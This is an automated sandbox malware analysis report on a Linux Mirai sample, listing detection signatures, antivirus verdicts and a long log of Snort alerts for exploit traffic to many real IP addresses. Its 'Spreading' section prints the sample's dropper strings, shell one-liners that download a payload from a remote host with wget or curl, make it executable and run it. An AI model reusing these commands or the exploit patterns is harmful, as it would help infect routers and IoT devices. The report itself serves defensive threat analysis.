Analysis Report nT7K5GG5km

Overview

General Information

Sample Name:	nT7K5GG5km
Analysis ID:	402069
MD5:	eec5c6c219535fba3a0492ea8118b397
SHA1:	292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:	12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Drops files in suspicious directories

Executes the "iptables" command to insert, remove and/or manipulate rules

Found strings indicative of a multi-platform dropper

Opens /proc/net/* files useful for finding connected devices and routers

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Terminates several processes with shell command 'killall'

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "iptables" command used for managing IP filtering and manipulation

HTTP GET or POST without a user agent

Reads system information from the proc file system

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes HTML files containing JavaScript to disk

Writes shell script files to disk

Yara signature match

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: nT7K5GG5km

Avira: detected

Antivirus detection for dropped file

Source: /usr/networks

Avira: detection malicious, Label: LINUX/Mirai.lldau

Multi AV Scanner detection for submitted file

Source: nT7K5GG5km	Virustotal: Detection: 65%	Perma Link
Source: nT7K5GG5km	Metadefender: Detection: 51%	Perma Link
Source: nT7K5GG5km	ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper

Source: nT7K5GG5km	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: nT7K5GG5km	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: nT7K5GG5km	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Opens /proc/net/* files useful for finding connected devices and routers

Source: /tmp/nT7K5GG5km (PID: 4623)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4623)	Opens: /proc/net/route			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:58004 -> 185.146.156.163:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.83.225.155: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.115.244.92: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.113.97: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.93.0.20: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.233.76.116: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:55646 -> 94.91.134.122:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.197.142.165: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.92.49.206: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.188.107.95: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.200.50.12: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.219.171.130: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.71.24.101: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.73.64.16: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.115.11.153: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 74.199.108.177: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 112.30.4.77:29583 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.250.123.141: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 223.130.28.80:12685 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.207.84.233: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.165.138.163: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.175.33.108: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 160.9.43.253: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.65.145.128: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.254.146.23:1027 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.143.214:12658 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.194.166.181:34323 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.83.51.81: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.10.2.50: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.39.241.178: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.173.141: -> 192.168.2.20:
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:39516
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:57484 -> 104.111.81.230:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.111.81.230:80 -> 192.168.2.20:57484
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 155.4.82.118: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.2.62.69: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.7.29.198: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50636 -> 81.196.113.75:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 86.65.65.146: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.159.66.221: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.186.146.41: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.78.107.232: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 172.16.16.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.203.255.9: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 72.35.40.202: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.131.61: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.128.213: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 130.236.0.8: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.117.97:80 -> 192.168.2.20:36288
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.94.183.248: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.187.161.54: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 65.144.251.70: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.41.173: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.223.233.145: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 118.151.143.192: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.184.161.124: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 192.168.51.205: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.48.247.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.213.18.103: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.131.254.22: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.161.200.6: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.227.175.107: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.196.216.151: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 166.88.241.155: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.62.3.74: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.91.166.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 208.71.234.42: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.230.19.100: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.146.228.186: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.155.152: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.85.44.74: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.242.180.69: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.233.149.60: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.95.159.167: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40460 -> 112.125.239.197:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.174.245.173: -> 192.168.2.20:
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:40704
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.125.79.34: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.243.30.45: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.47.216: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.252.81.170: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 164.82.21.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.97.57.196: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.46.148.51: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.21.227.159: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.44.57.192: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.86.81.6: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.197.4.212: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.118.110.204: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.126.117: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.210.74: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.106.133: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 175.45.105.154: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.244.211.255: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 93.51.232.252: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.179.241.64: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.214.192.245: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.129.90.38: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.193.95.45: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.33.116.90: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.152.110.224: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 64.189.20.4: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 119.225.210.242: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.1.99.120: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.142.94.93: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53688
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.102.211: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.162.58: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.249.224.17: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.16.47.151: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 207.35.88.172: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 23.27.78.110: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 27.32.160.214: -> 192.168.2.20:
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.180.165.26:23 -> 192.168.2.20:41576
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.105.99.147: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.222.33.55: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.207.101.92: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 96.88.3.156:23 -> 192.168.2.20:53962
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 49.255.62.198: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 146.148.194.79: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.151.248.115: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.212.50.15: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:52540 -> 210.190.146.92:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 49.44.132.19:80 -> 192.168.2.20:37336
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37336 -> 49.44.132.19:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.254.52.37: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 71.227.22.112: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.234.240: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.189.49.186: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:50030 -> 104.238.100.85:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59626 -> 77.182.10.124:80
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.179.24.162: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:57790 -> 147.46.176.166:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.124.230.135:80 -> 192.168.2.20:54640
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54640 -> 104.124.230.135:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:53902 -> 179.40.62.87:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.45.237.137: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.42.41.132: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 41.141.11.172: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.77.0.1: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 3.22.17.236:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.176.236: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.137.124.219: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.252.214.173: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 10.135.53.254: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.89.220.27: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:42472 -> 1.34.1.251:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.225.53.145: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 5.56.18.66: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.96.148.68: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 212.238.183.86: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.88.217: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.23.35:46153 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:45320 -> 45.148.37.237:80
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.247.167.217: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36288 -> 184.86.117.97:80
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.199.65.32: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.23.231.85: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 60.240.241.20: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.127.187:8082 -> 192.168.2.20:8080
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.63.180.12: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.91.249: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.134: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.236.31.232: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43254 -> 123.110.194.55:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 133.67.251.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.180.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.17.18.122: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:44576 -> 154.210.25.254:80
